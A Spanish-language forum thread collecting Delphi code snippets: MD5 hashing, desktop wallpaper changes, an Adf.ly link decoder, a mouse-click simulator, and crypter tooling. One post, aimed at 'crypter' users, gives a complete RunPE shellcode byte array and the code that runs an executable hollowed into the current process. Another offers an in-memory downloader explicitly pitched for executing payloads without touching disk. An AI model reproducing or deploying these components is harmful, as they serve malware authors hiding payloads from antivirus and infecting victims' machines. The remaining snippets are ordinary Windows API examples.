Librería de Snippets para Delphi

Iniciado por crack81, 5 Julio 2015, 20:05 PM


BDWONG

Les dejo dos funciones para obtener el MD5 tanto de ficheros como de cadenas. Las funciones fueron probadas en Delphi 2010; creo que en Delphi 7 cambia un poco la forma de obtenerlo.


uses
  SysUtils,IdHashMessageDigest, idHash,classes;

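// Returns the MD5 digest of the file at fileName as a hex string.
// The file is opened read-only with fmShareDenyWrite, so other processes may
// read it but not modify it while it is being hashed. Raises EFOpenError
// (from TFileStream) if the file cannot be opened.
// Fix: the hasher is created first and each object has its own try/finally,
// so a failure to open the file no longer leaks the TIdHashMessageDigest5.
function FileMD5(const fileName: string): string;
var
  hasher: TIdHashMessageDigest5;
  fs: TFileStream;
begin
  hasher := TIdHashMessageDigest5.Create;
  try
    fs := TFileStream.Create(fileName, fmOpenRead or fmShareDenyWrite);
    try
      Result := hasher.HashStreamAsHex(fs);
    finally
      fs.Free;
    end;
  finally
    hasher.Free;
  end;
end;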


// Returns the MD5 digest of data as a hex string, computed with Indy's
// TIdHashMessageDigest5. The hasher exists only for the duration of the call.
function StringMd5(const data: string): string;
var
  hasher: TIdHashMessageDigest5;
begin
  hasher := TIdHashMessageDigest5.Create;
  try
    Result := hasher.HashStringAsHex(data);
  finally
    hasher.Free;
  end;
end;


// Demo program body: prints the MD5 of a file and then of a literal string.
var
  archivo, texto: string;
begin
  archivo := 'C:\project1.exe';
  writeln('El md5 del fichero es ', FileMD5(archivo));

  texto := 'hola mundo';
  writeln('El md5 del string  es ', StringMd5(texto));

  readln;
end.


crack81

Función para cambiar el fondo del escritorio utilizando la API de Windows

uses
  SysUtils,
  windows;

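// Sets the desktop wallpaper to the image at imagen via SystemParametersInfo.
// Parameters:
//   imagen  - path of the image file.
//   persist - when True the setting is also written to the user profile and
//             broadcast to running applications (SPIF_UPDATEINIFILE or
//             SPIF_SENDCHANGE), so it survives the next logon. The default
//             False keeps the original behaviour (fWinIni = 0).
// Returns True when the API call succeeded.
// Fixes: the magic number 20 is replaced by SPI_SETDESKWALLPAPER, and
// PChar(imagen) is passed instead of @imagen[1], which is an invalid pointer
// when imagen is empty.
function cambiarFondo(const imagen: string; persist: Boolean = False): Boolean;
var
  flags: UINT;
begin
  if persist then
    flags := SPIF_UPDATEINIFILE or SPIF_SENDCHANGE
  else
    flags := 0;
  Result := SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, PChar(imagen), flags);
end;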

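// Demo: changes the wallpaper and reports the outcome.
// Fixes: the unused variable foto is removed, and 'Imagen cambiada' is only
// printed when cambiarFondo actually returned True.
begin
  if cambiarFondo('image.bmp') then
    writeln('Imagen cambiada')
  else
    writeln('No se pudo cambiar la imagen');
  readln;
end.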



Otra alternativa para cambiar el fondo del escritorio, pero ahora utilizando la interfaz IActiveDesktop

uses
  SysUtils,
  ComObj,ShlObj,ActiveX,windows;
 
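// Sets the desktop wallpaper through the IActiveDesktop COM interface.
// Parameters:
//   Image - path of the image file, handed to IActiveDesktop.SetWallpaper.
// Returns True only when both SetWallpaper and ApplyChanges report success.
// Raises EOleSysError (via CreateComObject) if the object cannot be created.
// Fixes: CreateComObject now runs inside the try block so a failure still
// reaches CoUninitialize; the interface reference is released before
// CoUninitialize (releasing it afterwards is a use-after-uninitialise bug);
// and the HRESULTs are checked instead of returning True unconditionally.
function ChangeWallpaper(const Image: WideString): Boolean;
const
  CLSID_ActiveDesktop: TGUID = '{75048700-EF1F-11D0-9888-006097DEACF9}';
var
  ADesktop: IActiveDesktop;
begin
  Result := False;
  CoInitialize(nil); // return value intentionally not checked, as in the original
  try
    ADesktop := CreateComObject(CLSID_ActiveDesktop) as IActiveDesktop;
    try
      Result := Succeeded(ADesktop.SetWallpaper(PWideChar(Image), 0));
      if Result then
        Result := Succeeded(ADesktop.ApplyChanges(AD_APPLY_ALL or AD_APPLY_FORCE));
    finally
      ADesktop := nil; // drop the reference while COM is still initialised
    end;
  finally
    CoUninitialize;
  end;
end;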

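// Demo: applies the wallpaper and reports the outcome.
// Fix: the Boolean result of ChangeWallpaper was ignored and 'Imagen cambiada'
// was printed unconditionally.
begin
   if ChangeWallpaper('C:\image.bmp') then
      Writeln('Imagen cambiada')
   else
      Writeln('No se pudo cambiar la imagen');
   Readln;
end.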



crack81

Función para decodificar una URL del servicio Adf.ly.
Uso: le pasamos la URL codificada y nos retorna la original. Ojo: para usar esta función se necesita conexión a internet.


uses
  SysUtils,
  IdHTTP,
  IdCoderMIME;

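// Undoes the character interleaving of an Adf.ly "ysmm" value and Base64-decodes it.
// Characters at positions 1,3,5,... are appended in order; characters at
// positions 2,4,6,... are prepended in reverse order. The joined string is
// Base64; the first two characters of the decoded text are dropped.
// Fix: the original read data[i+1] past the end when Length(data) was odd.
function DecodeYsmm(const data: string): string;
var
  i: Integer;
  part1, part2, decoded: string;
begin
  part1 := '';
  part2 := '';
  i := 1;
  while i <= Length(data) do
  begin
    part1 := part1 + data[i];
    if i < Length(data) then // guard against odd-length input
      part2 := data[i + 1] + part2;
    Inc(i, 2);
  end;
  decoded := TIdDecoderMIME.DecodeString(part1 + part2);
  Result := Copy(decoded, 3, Length(decoded) - 2);
end;

// Resolves an Adf.ly short URL to its destination.
// Parameters:
//   url - the shortened Adf.ly link; its HTML page is fetched over HTTP.
// Returns the destination URL, or '' when the page does not contain the
// "ysmm = '...';" marker (the original indexed content[0] in that case).
// Raises whatever TIdHTTP.Get raises on network or HTTP errors.
function DecodeAdFly(const url: string): string;
const
  STRINGKEY = 'ysmm = ';
var
  http: TIdHTTP;
  content, data: string;
  pos1, pos2, npos: Integer;
begin
  Result := '';
  http := TIdHTTP.Create(nil);
  try
    content := http.Get(url);
    pos1 := Pos(STRINGKEY, content);
    if pos1 = 0 then
      Exit; // marker absent: not an Adf.ly page or the layout changed
    // Count characters from the marker up to and including the terminating ';',
    // stopping at the end of content so a missing ';' cannot run off the string.
    pos2 := 1;
    npos := pos1;
    while (npos <= Length(content)) and (content[npos] <> ';') do
    begin
      Inc(npos);
      Inc(pos2);
    end;
    // Skip the marker and the opening quote; drop the two quotes and the ';'.
    data := Copy(content, pos1 + Length(STRINGKEY) + 1, pos2 - Length(STRINGKEY) - 3);
    Result := DecodeYsmm(data);
  finally
    http.Free;
  end;
end;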

// Demo: resolves one shortened link and prints the destination URL.
begin
  writeln(DecodeAdFly('http://adf.ly/dLgCS'));
  readln;
end.

crack81

Para lo  que les gusta el tema de los crypter les traigo un runpe en modo shellcode
y como usarlo

uses
  SysUtils,windows;

//shellcode del runPE  uso y parametros: runPE(path:pwidechar; bufferExe:pointer):cardinal;
Const
  Shell: Array [0 .. 1287] Of Byte = ($60, $E8, $4E, $00, $00, $00, $6B, $00, $65, $00, $72, $00, $6E, $00, $65, $00, $6C, $00, $33, $00, $32, $00, $00, $00, $6E, $00, $74, $00, $64, $00, $6C, $00,
    $6C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $5B, $8B, $FC, $6A, $42, $E8, $BB, $03, $00, $00, $8B, $54, $24, $28, $89, $11, $8B, $54, $24, $2C, $6A, $3E, $E8, $AA, $03, $00,
    $00, $89, $11, $6A, $4A, $E8, $A1, $03, $00, $00, $89, $39, $6A, $1E, $6A, $3C, $E8, $9D, $03, $00, $00, $6A, $22, $68, $F4, $00, $00, $00, $E8, $91, $03, $00, $00, $6A, $26, $6A, $24, $E8, $88,
    $03, $00, $00, $6A, $2A, $6A, $40, $E8, $7F, $03, $00, $00, $6A, $2E, $6A, $0C, $E8, $76, $03, $00, $00, $6A, $32, $68, $C8, $00, $00, $00, $E8, $6A, $03, $00, $00, $6A, $2A, $E8, $5C, $03, $00,
    $00, $8B, $09, $C7, $01, $44, $00, $00, $00, $6A, $12, $E8, $4D, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $79, $03, $00, $00, $6A, $3E, $E8, $3B, $03, $00, $00, $8B, $D1, $6A, $1E, $E8,
    $32, $03, $00, $00, $6A, $40, $FF, $32, $FF, $31, $FF, $D0, $6A, $12, $E8, $23, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $4F, $03, $00, $00, $6A, $1E, $E8, $11, $03, $00, $00, $8B, $09,
    $8B, $51, $3C, $6A, $3E, $E8, $05, $03, $00, $00, $8B, $39, $03, $FA, $6A, $22, $E8, $FA, $02, $00, $00, $8B, $09, $68, $F8, $00, $00, $00, $57, $51, $FF, $D0, $6A, $00, $E8, $E8, $02, $00, $00,
    $68, $88, $FE, $B3, $16, $51, $E8, $14, $03, $00, $00, $6A, $2E, $E8, $D6, $02, $00, $00, $8B, $39, $6A, $2A, $E8, $CD, $02, $00, $00, $8B, $11, $6A, $42, $E8, $C4, $02, $00, $00, $57, $52, $6A,
    $00, $6A, $00, $6A, $04, $6A, $00, $6A, $00, $6A, $00, $6A, $00, $FF, $31, $FF, $D0, $6A, $12, $E8, $A9, $02, $00, $00, $68, $D0, $37, $10, $F2, $51, $E8, $D5, $02, $00, $00, $6A, $22, $E8, $97,
    $02, $00, $00, $8B, $11, $6A, $2E, $E8, $8E, $02, $00, $00, $8B, $09, $FF, $72, $34, $FF, $31, $FF, $D0, $6A, $00, $E8, $7E, $02, $00, $00, $68, $9C, $95, $1A, $6E, $51, $E8, $AA, $02, $00, $00,
    $6A, $22, $E8, $6C, $02, $00, $00, $8B, $11, $8B, $39, $6A, $2E, $E8, $61, $02, $00, $00, $8B, $09, $6A, $40, $68, $00, $30, $00, $00, $FF, $72, $50, $FF, $77, $34, $FF, $31, $FF, $D0, $6A, $36,
    $E8, $47, $02, $00, $00, $8B, $D1, $6A, $22, $E8, $3E, $02, $00, $00, $8B, $39, $6A, $3E, $E8, $35, $02, $00, $00, $8B, $31, $6A, $22, $E8, $2C, $02, $00, $00, $8B, $01, $6A, $2E, $E8, $23, $02,
    $00, $00, $8B, $09, $52, $FF, $77, $54, $56, $FF, $70, $34, $FF, $31, $6A, $00, $E8, $10, $02, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $3C, $02, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $12,
    $E8, $F9, $01, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $25, $02, $00, $00, $6A, $22, $E8, $E7, $01, $00, $00, $8B, $11, $83, $C2, $06, $6A, $3A, $E8, $DB, $01, $00, $00, $6A, $02, $52, $51,
    $FF, $D0, $6A, $36, $E8, $CE, $01, $00, $00, $C7, $01, $00, $00, $00, $00, $B8, $28, $00, $00, $00, $6A, $36, $E8, $BC, $01, $00, $00, $F7, $21, $6A, $1E, $E8, $B3, $01, $00, $00, $8B, $11, $8B,
    $52, $3C, $81, $C2, $F8, $00, $00, $00, $03, $D0, $6A, $3E, $E8, $9F, $01, $00, $00, $03, $11, $6A, $26, $E8, $96, $01, $00, $00, $6A, $28, $52, $FF, $31, $6A, $12, $E8, $8A, $01, $00, $00, $68,
    $5B, $E8, $14, $CF, $51, $E8, $B6, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $26, $E8, $73, $01, $00, $00, $8B, $39, $8B, $09, $8B, $71, $14, $6A, $3E, $E8, $65, $01, $00, $00, $03, $31, $6A,
    $26, $E8, $5C, $01, $00, $00, $8B, $09, $8B, $51, $0C, $6A, $22, $E8, $50, $01, $00, $00, $8B, $09, $03, $51, $34, $6A, $46, $E8, $44, $01, $00, $00, $8B, $C1, $6A, $2E, $E8, $3B, $01, $00, $00,
    $8B, $09, $50, $FF, $77, $10, $56, $52, $FF, $31, $6A, $00, $E8, $2A, $01, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $56, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $36, $E8, $13, $01, $00,
    $00, $8B, $11, $83, $C2, $01, $89, $11, $6A, $3A, $E8, $05, $01, $00, $00, $8B, $09, $3B, $CA, $0F, $85, $33, $FF, $FF, $FF, $6A, $32, $E8, $F4, $00, $00, $00, $8B, $09, $C7, $01, $07, $00, $01,
    $00, $6A, $00, $E8, $E5, $00, $00, $00, $68, $D2, $C7, $A7, $68, $51, $E8, $11, $01, $00, $00, $6A, $32, $E8, $D3, $00, $00, $00, $8B, $11, $6A, $2E, $E8, $CA, $00, $00, $00, $8B, $09, $52, $FF,
    $71, $04, $FF, $D0, $6A, $22, $E8, $BB, $00, $00, $00, $8B, $39, $83, $C7, $34, $6A, $32, $E8, $AF, $00, $00, $00, $8B, $31, $8B, $B6, $A4, $00, $00, $00, $83, $C6, $08, $6A, $2E, $E8, $9D, $00,
    $00, $00, $8B, $11, $6A, $46, $E8, $94, $00, $00, $00, $51, $6A, $04, $57, $56, $FF, $32, $6A, $00, $E8, $86, $00, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $B2, $00, $00, $00, $83, $C4, $0C,
    $FF, $D0, $6A, $22, $E8, $6F, $00, $00, $00, $8B, $09, $8B, $51, $28, $03, $51, $34, $6A, $32, $E8, $60, $00, $00, $00, $8B, $09, $81, $C1, $B0, $00, $00, $00, $89, $11, $6A, $00, $E8, $4F, $00,
    $00, $00, $68, $D3, $C7, $A7, $E8, $51, $E8, $7B, $00, $00, $00, $6A, $32, $E8, $3D, $00, $00, $00, $8B, $D1, $6A, $2E, $E8, $34, $00, $00, $00, $8B, $09, $FF, $32, $FF, $71, $04, $FF, $D0, $6A,
    $00, $E8, $24, $00, $00, $00, $68, $88, $3F, $4A, $9E, $51, $E8, $50, $00, $00, $00, $6A, $2E, $E8, $12, $00, $00, $00, $8B, $09, $FF, $71, $04, $FF, $D0, $6A, $4A, $E8, $04, $00, $00, $00, $8B,
    $21, $61, $C3, $8B, $CB, $03, $4C, $24, $04, $C3, $6A, $00, $E8, $F2, $FF, $FF, $FF, $68, $54, $CA, $AF, $91, $51, $E8, $1E, $00, $00, $00, $6A, $40, $68, $00, $10, $00, $00, $FF, $74, $24, $18,
    $6A, $00, $FF, $D0, $FF, $74, $24, $14, $E8, $CF, $FF, $FF, $FF, $89, $01, $83, $C4, $10, $C3, $E8, $22, $00, $00, $00, $68, $A4, $4E, $0E, $EC, $50, $E8, $4B, $00, $00, $00, $83, $C4, $08, $FF,
    $74, $24, $04, $FF, $D0, $FF, $74, $24, $08, $50, $E8, $38, $00, $00, $00, $83, $C4, $08, $C3, $55, $52, $51, $53, $56, $57, $33, $C0, $64, $8B, $70, $30, $8B, $76, $0C, $8B, $76, $1C, $8B, $6E,
    $08, $8B, $7E, $20, $8B, $36, $38, $47, $18, $75, $F3, $80, $3F, $6B, $74, $07, $80, $3F, $4B, $74, $02, $EB, $E7, $8B, $C5, $5F, $5E, $5B, $59, $5A, $5D, $C3, $55, $52, $51, $53, $56, $57, $8B,
    $6C, $24, $1C, $85, $ED, $74, $43, $8B, $45, $3C, $8B, $54, $28, $78, $03, $D5, $8B, $4A, $18, $8B, $5A, $20, $03, $DD, $E3, $30, $49, $8B, $34, $8B, $03, $F5, $33, $FF, $33, $C0, $FC, $AC, $84,
    $C0, $74, $07, $C1, $CF, $0D, $03, $F8, $EB, $F4, $3B, $7C, $24, $20, $75, $E1, $8B, $5A, $24, $03, $DD, $66, $8B, $0C, $4B, $8B, $5A, $1C, $03, $DD, $8B, $04, $8B, $03, $C5, $5F, $5E, $5B, $59,
    $5A, $5D, $C3, $C3, $00, $00, $00, $00);


// Reads the whole file at Ruta into a string using the legacy _lopen/_lread/
// _lclose file API and returns its raw bytes.
// NOTE(review): no return value is checked - _lopen can return HFILE_ERROR,
// GetFileSize can fail, and _lread may read fewer than uBytes bytes; @Result[1]
// is also an invalid pointer when the file is empty.
Function mFileToStr(Ruta: string): string;
var
sFile: HFile;
uBytes: Cardinal;
begin
sFile:= _lopen(PChar(Ruta), OF_READ); // open read-only
uBytes:= GetFileSize(sFile, nil);     // size in bytes (high DWORD ignored)
SetLength(Result, uBytes);
_lread(sfile, @result[1], uBytes);     // copy the file content into Result
_lclose(sFile);
end;

var
buffer:string;
szFilePath:array[1..1024]of widechar;

begin
  buffer:=mFileToStr('C:\bcb6kg.EXE'); //Leemos el fichero que queremos usar
  GetModuleFileNameW(0,@szFilePath[1],1024); //GetModuleFileNameW equivalente al paramstr(0) pero unicode
  writeln(pwidechar(widestring(szFilePath))); //mostramos la direccion actual del proyecto principal

  //el problema de llamado consistia en que el path tenia que ser unicode y yo lo manejaba como si fuera ascii
  CallWindowProcW(@shell[0],hwnd(@szFilePath[1]),cardinal(@buffer[1]),0,0);//ejecutamos el shellcode
  readln;
end.

crack81

Funcion downloadFileBuffer

Hola, después de lo comentado en el foro hermano indetectables.net sobre la función URLOpenBlockingStream he decidido hacer mi implementación en Delphi.
Bueno, esta función lo que hace es descargar un fichero, pero en vez de escribirlo en disco lo guarda en un buffer en memoria.

Bueno el uso que le demos puede ser variado ya que si queremos podemos escribir el contenido de ese buffer o ejecutarlo en memoria sin que toque disco.
el ejemplo viene con un simple ejemplo, me imagino que el va usar este ejemplo ya sabe como ejecutar un fichero en memoria o crear un nuevo fichero a travez de el
si tienen dudas sobre algo me avisan.

uses
  SysUtils,ActiveX,URLMon;

// Dynamic byte array; downloadFileBuffer returns the downloaded content as one.
type
TBuffer=Array of Byte;

// Downloads the resource at URL into memory and returns it as a byte array.
// Returns nil when URLOpenBlockingStream does not report S_OK.
// The size is obtained by seeking to the end of the IStream; the stream is then
// rewound and read in a single call.
// NOTE(review): the HRESULTs of Seek and Read are not checked, bytesWritten is
// never compared with sizeFile (a short read leaves the tail of the buffer
// zeroed), SetLength narrows the Int64 size to an Integer, and @buffer[0] is an
// invalid pointer when the resource is empty.
Function downloadFileBuffer(const URL:String):TBuffer;
var
stream:IStream;
sizeFile,sizeSet,bytesWritten:Int64;
buffer:TBuffer;
begin
Result:=nil;
if URLOpenBlockingStream (nil,pchar(URL),stream,0,nil)=S_OK then
begin
     stream.Seek(0,STREAM_SEEK_END,sizeFile);   // position at end gives the size
     SetLength(buffer,sizeFile);
     stream.Seek(0,STREAM_SEEK_SET,sizeSet);    // rewind before reading
     stream.Read(@buffer[0],sizeFile,@bytesWritten);
     Result:=buffer;
end;
end;

// Demo: downloads one image into memory and reports its size, or an error.
var
  direccion: String;
  datos: TBuffer;
begin
  direccion := 'http://i67.tinypic.com/2v8lv88.png';
  datos := downloadFileBuffer(direccion);

  if datos = nil then
     Writeln('Hubo un error ')
  else
     Writeln('Tamano del fichero leido ', Length(datos));

  Readln;
end.


El código ha sido probado en Delphi 7

Saludos....

crack81

[simulateClick] Función que simula el dar un click con el ratón usando la API de Windows y la versión Delphi 2010

uses
  SysUtils,windows;

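// Simulates a left mouse click at screen coordinates (x, y) using SendInput.
// Parameters:
//   x, y - screen coordinates where the click is performed.
// Returns the number of input events SendInput injected (2 when both the
// button-down and the button-up event were accepted).
// The cursor is moved with SetCursorPos, both events are sent, and the cursor
// is then put back where it was so the pointer appears not to have moved.
// Fix: the original assigned y to mi.dx a second time and never set mi.dy.
function simulateClick(const x, y: Integer): Integer;
var
  origin: TPoint;
  events: array[0..1] of TInput;
begin
  GetCursorPos(origin);   // remember the current pointer position
  SetCursorPos(x, y);     // move the pointer to the requested position
  ZeroMemory(@events, SizeOf(events));

  // Left button down. No MOUSEEVENTF_MOVE/ABSOLUTE flag is set, so dx/dy do
  // not move the pointer here; the position comes from SetCursorPos above.
  events[0].Itype := INPUT_MOUSE;
  events[0].mi.dx := x;
  events[0].mi.dy := y;
  events[0].mi.dwFlags := MOUSEEVENTF_LEFTDOWN;

  // Left button up.
  events[1].Itype := INPUT_MOUSE;
  events[1].mi.dx := x;
  events[1].mi.dy := y;
  events[1].mi.dwFlags := MOUSEEVENTF_LEFTUP;

  Result := SendInput(2, events[0], SizeOf(TInput));
  SetCursorPos(origin.X, origin.Y); // restore the original position
end;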


// Prints the cursor's current screen position as "X x Y".
// Useful inside an endless loop to watch the coordinates while moving the mouse.
procedure printPosition;
var
  cursor: TPoint;
begin
  GetCursorPos(cursor);
  Writeln(Format('%d x %d', [cursor.X, cursor.Y]));
end;
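// Program entry: performs one simulated click and reports the outcome.
// Fix: the original ignored simulateClick's return value and printed
// 'Click simulado' even when SendInput injected fewer than 2 events.
begin
   if simulateClick(20, 882) = 2 then
      Writeln('Click simulado')
   else
      Writeln('No se pudo simular el click');
end.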